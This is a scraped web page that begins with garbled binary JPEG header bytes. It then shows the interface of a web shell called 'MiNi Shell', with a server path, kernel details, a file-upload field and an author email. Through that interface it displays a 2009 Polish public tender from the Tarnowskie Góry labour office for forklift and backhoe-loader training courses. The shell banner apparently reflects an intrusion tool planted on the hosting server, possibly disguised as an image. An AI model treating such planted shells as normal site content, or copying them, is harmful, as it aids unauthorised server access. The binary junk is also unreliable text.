JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/85255-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Przeprowadzenie szkoleń dla osób bezrobotnych.</b><br>
<b>Numer ogłoszenia: 85255 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowskich Górach , ul. Towarowa 1, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 2855038, faks 032 2855038 w. 118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-tg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla osób bezrobotnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób bezrobotnych w następujących kierunkach:
1. Magazynier z obsługą wózka widłowego dla 50 osób
2. Operator sprzętu ciężkiego (koparko-ładowarki) dla 50 osób.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
Dotyczy zadania 1. Magazynier z obsługą wózka widłowego:
a) Spełniają warunki określone w art. 22 ust. 1 Ustawy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                       i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
	b) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 Ustawy.
c) Dysponują lub będą dysponować co najmniej jednym wózkiem widłowym posiadającym ważny przegląd UDT.
d)	Dysponują lub będą dysponować:
- co najmniej dwoma osobami, które:
i. 	posiadają min. wykształcenie średnie 
ii.	posiadają min. roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia;
iii.	posiadają ukończony kurs pedagogiczny, studium pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć.
- co najmniej jedną osobą, która posiada uprawnienia operatora wózka widłowego (UDT bądź wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie).
Dotyczy zadania 2. Operator sprzętu ciężkiego (koparko-ładowarki):
a) Spełniają warunki określone w art. 22 ust. 1 Ustawy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                       i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
b)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 Ustawy.
c)	Dysponują lub będą dysponować co najmniej jedną koparko - ładowarką sprawną technicznie
d)	Dysponują lub będą dysponować:
- co najmniej jednym wykładowcą:
i. 	legitymującym się wyższym wykształceniem technicznym,  
ii.	posiadającym min. roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia;
iii.	posiadającym ukończony kurs pedagogiczny, studium pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć.
- co najmniej dwoma instruktorami do realizacji zajęć praktycznych:
i.	posiadającymi co najmniej średnie wykształcenie techniczne,
ii.	posiadającymi uprawnienia operatora koparko - ładowarki III klasy
iii.	posiadającymi min. roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy z Wykonawców musi przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
a) Wypełniony, podpisany i opieczętowany przez osobę upoważnioną (osoby upoważnione) do reprezentowania Wykonawcy formularz ofertowy według wzoru stanowiącego załącznik nr 1 do niniejszej specyfikacji (do każdej części zamówienia Wykonawca zobowiązany jest złożyć osobny formularz ofertowy);
b) Zaparafowany lub podpisany i opieczętowany przez osobę upoważnioną (osoby upoważnione) do reprezentowania Wykonawcy wzór istotnych postanowień umowy stanowiący załącznik nr 8 do niniejszej specyfikacji;
c) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy prawa wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d) Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające,                            że Wykonawca nie zalega z opłacaniem podatków i opłat, lub uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, lub uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
f) Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 Ustawy (oświadczenie znajduje się w formularzu ofertowym, stanowiącym załącznik nr 1 do niniejszej specyfikacji);
g) Oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy (oświadczenie znajduje się w formularzu ofertowym, stanowiącym załącznik nr 1 do niniejszej specyfikacji);
h) Stosowne pełnomocnictwo w przypadku, gdy nie wynika ono z dokumentu dopuszczającego do obrotu lub umowy spółki cywilnej;
i) Umowę regulującą współpracę podmiotów występujących wspólnie lub list intencyjny w sprawie wspólnego wykonania zamówienia lub pełnomocnictwo dla lidera podmiotów występujących wspólnie (o ile dotyczy);
j) Umowę spółki cywilnej, jeśli działalność gospodarcza prowadzona jest w formie spółki cywilnej (w celu identyfikacji wspólników, stron, zasad i sposobu reprezentowania spółki);
k) Oświadczenie o podwykonawstwie (w przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, wskazując tę część) - dla każdego zadania odrębnie;
l) Program kursu sporządzony zgodnie ze wzorem stanowiącym załącznik nr 4 do niniejszej specyfikacji (w celu dokonania oceny oferty zgodnie z kryterium oceny oferty określonym w punkcie XII.1.1.3 lit. a - dotyczy zadania 1; w punkcie XII.1.2.3 lit. a - dotyczy zadania 2; w przypadku nie załączenia do oferty ww. dokumentu Wykonawca zostanie odrzucony na podstawie art. 89 ust. 1 pkt 2 ustawy - treść oferty nie odpowiada treści SIWZ) - dla każdego zadania odrębnie;
ł) Aktualne zaświadczenie tj. z 2009 roku o wpisie do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej w oparciu o Rozporządzenie Ministra Gospodarki i Pracy w sprawie rejestru instytucji szkoleniowych z dnia 27 października 2004 roku (Dz. U. z 2004 r., Nr 236, poz. 2365);
m) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności zgodnie ze wzorem stanowiącym załącznik nr 6 do niniejszej specyfikacji (dla każdego zadania odrębnie);
n) Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. V.1 lit. m, Wykonawca wskazał osoby, którymi będzie dysponował (dla każdego zadania odrębnie);
o) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca (dla każdego zadania odrębnie);
p) Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt V.1 lit. o, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował (dla każdego zadania odrębnie);
r) Wzór zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, uwzględniających oznaczenia wynikające z pkt II.8 oraz pkt II.20 (w celu dokonania oceny oferty zgodnie z kryterium oceny oferty określonym w punkcie XII.1.1.3 lit. c - dotyczy zadania 1; w punkcie XII.1.2.3 lit. c - dotyczy zadania 2; w przypadku nie załączenia do oferty ww. dokumentu Wykonawca otrzyma 0 punktów w tym kryterium) - dla każdego zadania odrębnie;
s) Oświadczenie o posiadaniu lub nieposiadaniu certyfikatu jakości usług (w celu dokonania oceny oferty zgodnie z kryterium oceny oferty określonym w punkcie XII.1.1.3 lit. e - dotyczy zadania 1; w punkcie XII.1.2.3 lit. e - dotyczy zadania 2; w przypadku nie załączenia do oferty ww. dokumentu Wykonawca otrzyma 0 punktów w tym kryterium);
t) Opis bazy lokalowej wraz z fotografiami oraz z informacją o usytuowaniu:
- miejsca prowadzenia zajęć praktycznych - dotyczy zadania 1
- placu manewrowego (poligonu) - dotyczy zadania 2 
(w celu dokonania oceny oferty zgodnie z kryterium oceny oferty określonym w punkcie XII.1.1.5 lit. b - dotyczy zadania 1; w punkcie XII.1.2.5 lit. b - dotyczy zadania 2; w przypadku nie załączenia do oferty ww. dokumentu Wykonawca otrzyma  0  punktów w tym kryterium)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Czas trwania szkolenia - 10</li>
<li>3 - Program szkolenia - 10</li>
<li>4 - Sposób sprawdzenia przez Wykonawców efektów szkolenia - 5</li>
<li>5 - Rodzaj dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji - 5</li>
<li>6 - Zaangażowanie Wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
<li>7 - Posiadanie certyfikatu jakości usług - 5</li>
<li>8 - Kadra - 5</li>
<li>9 - Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>10 - Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup-tg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowskich Górach
ul. Towarowa 1
42-600 Tarnowskie Góry 
Sekretariat II piętro
pokój 321.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Tarnowskich Górach
ul. Towarowa 1
42-600 Tarnowskie Góry 
Sekretariat II piętro
pokój 321.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przeprowadzenie szkoleń jest współfinansowane ze środków Unii Europejskiej w ramach projektu Twoje lepsze jutro - Poddziałanie 6.1.3. PO KL.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Magazynier z obsługą wózka widlowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - sugerowana liczba godzin: min. 124
- liczba osób objętych szkoleniem: 50
- egzamin UDT powinien zostać przeprowadzony w terminie do dwóch tygodni po zakończeniu szkolenia
- realizacja w trzech grupach szkoleniowych
- cena powinna uwzględniać koszt jednego egzaminu dla każdego uczestnika szkolenia, przeprowadzonego zgodnie z wymogami Rozporządzenia Ministra Gospodarki w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych z dnia 18 lipca 2001 r. (Dz. U. z 2001 r., Nr 122,  poz. 1269 z późn. zm.) 
- zajęcia maja być prowadzone w oparciu o przepisy Rozporządzenia Ministra Gospodarki w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym z dnia 10 maja 2002 r. (Dz. U. z 2002 r., Nr 70 poz. 650 z poźn. zm.)
- tematyka szkolenia powinna obejmować m.in.: 
	-	podstawowe wiadomości z obsługi magazynu,
	-	obsługa programu komputerowego dot. prowadzenia magazynu,
	-	typy, odmiany stosowanych wózków jezdniowych,
	-	budowa wózka,
		-	czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy                  
			z wózkami,
	-	czynności operatora w czasie pracy z wózkami,
	-	wiadomości z zakresu ładunkoznawstwa,
	-	wiadomości z zakresu BHP,
	-	praktyczna nauka jazdy,
	-	bezpieczna obsługa - wymiana butli gazowych,
	-	wiadomości o dozorze technicznym dot. obsługi wózków jezdniowych 
podnośnikowych z mechanicznym napędem podnoszenia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Czas trwania szkolenia - 10</li>
<li>3. Program szkolenia - 10</li>
<li>4. Sposób sprawdzenia przez Wykonawcę efektów szkolenia - 5</li>
<li>5. Rodzaj dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji - 5</li>
<li>6. Zaangażowanie Wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
<li>7. Posiadanie certyfikatu jakości usług - 5</li>
<li>8. Kadra - 5</li>
<li>9. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>10. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Operator sprzętu ciężkiego (koparko-ładowarki).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - sugerowana liczba godzin: min. 206
- liczba osób objętych szkoleniem: 50
- egzamin końcowy powinien zostać przeprowadzony w ostatnim dniu prowadzonych zajęć
- realizacja w trzech grupach szkoleniowych 
- cena powinna uwzględniać koszt jednego egzaminu przeprowadzonego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie dla każdego uczestnika szkolenia 
- zajęcia mają być prowadzone w oparciu o program opracowany przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego, zgodnie z wymogami Rozporządzenia Ministra Gospodarki            w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych z dnia 20 września 2001 roku (Dz. U. z 201 r., Nr 118, poz. 1263);
- tematyka szkolenia powinna obejmować m.in.: 
	-	użytkowanie eksploatacyjne, 
	-	dokumentacja techniczna,
	-	bezpieczeństwo i higiena pracy,
	-	podstawy elektrotechniki,
	- 	silniki spalinowe,
	-	elementy hydrauliki,
	-	budowa koparek (koparko-ładowarek)
	-	technologia robót,
	-	zajęcia praktyczne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Czas trwania - 10</li>
<li>3. Program szkolenia - 10</li>
<li>4. Sposób sprawdzenia przez Wykonawcę efektów szkolenia - 5</li>
<li>5. Rodzaj dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji - 5</li>
<li>6. Zaangażowanie Wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
<li>7. Posiadanie certyfikatu jakości usług - 5</li>
<li>8. Kadra - 5</li>
<li>9. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>10. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com